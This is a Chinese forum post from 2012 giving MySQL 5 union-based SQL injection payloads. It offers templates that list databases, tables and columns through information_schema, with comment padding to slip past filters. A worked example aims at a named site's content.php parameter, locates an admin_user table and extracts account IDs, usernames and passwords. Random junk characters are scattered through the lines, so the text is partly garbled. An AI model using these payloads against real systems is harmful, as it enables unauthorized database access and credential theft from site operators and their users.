查库
4 Y, ?" }+ C8 D8 y* M3 Z, O- y, p+ v! ?7 c5 x7 b" C
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
& g3 V" D" v I; f" {9 T7 Z
: o2 T. O# i( z5 C0 F+ Y( r; L查表
1 T! f( k4 I% I, u3 k4 o5 V$ n7 d) s
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,17 q9 f* o; X; S- v: n; R5 D6 c2 g) U* H8 J
! ?/ ?& _- c0 n+ z+ m, F查段# A8 s; R4 `; O! [2 A, S
: a- j& b+ B, }7 W/ l! K
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
% m/ b' t6 g" ^6 x. L4 ^
T/ K9 f! C7 t# A. v, Q, J* b. Y6 f- D+ R4 n* R' l, S8 i, P" ]
mysql5高级注入方法暴表
$ u' ^1 h3 |7 u& N9 A I* y g, l5 C$ S; V9 Z% G7 F/ L
例子如下:
( U, ~" [2 ~8 l; Y U; `2 G! ~9 d+ F; }1 Q* B j
1.爆表
' ^4 E+ A b/ n( v; Yhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)& P& Q5 n0 ^, M6 A' Z. n6 ^
这样爆到第4个时出现了admin_user表。
4 v# a" T F' `, n* \( Z2 p9 H
, I' v3 O7 G7 h3 |+ t2.暴字段
& n \ b! t3 zhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*! }/ j, A- j% b8 n/ L/ h
1 W/ h7 m/ U7 F2 o% f, x8 p2 w% c% W& ]. D$ p6 M! ?
3.爆密码/ h1 {" C8 E/ S' Q( n, S6 V( ?( V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* . k. C0 |& k( j" _0 q2 J
* R. `% @/ @* {* v6 S0 V( c) U/ l1 C- f" ~( P3 i
|
发表于 2012-9-13 16:29:37
收藏
支持
反对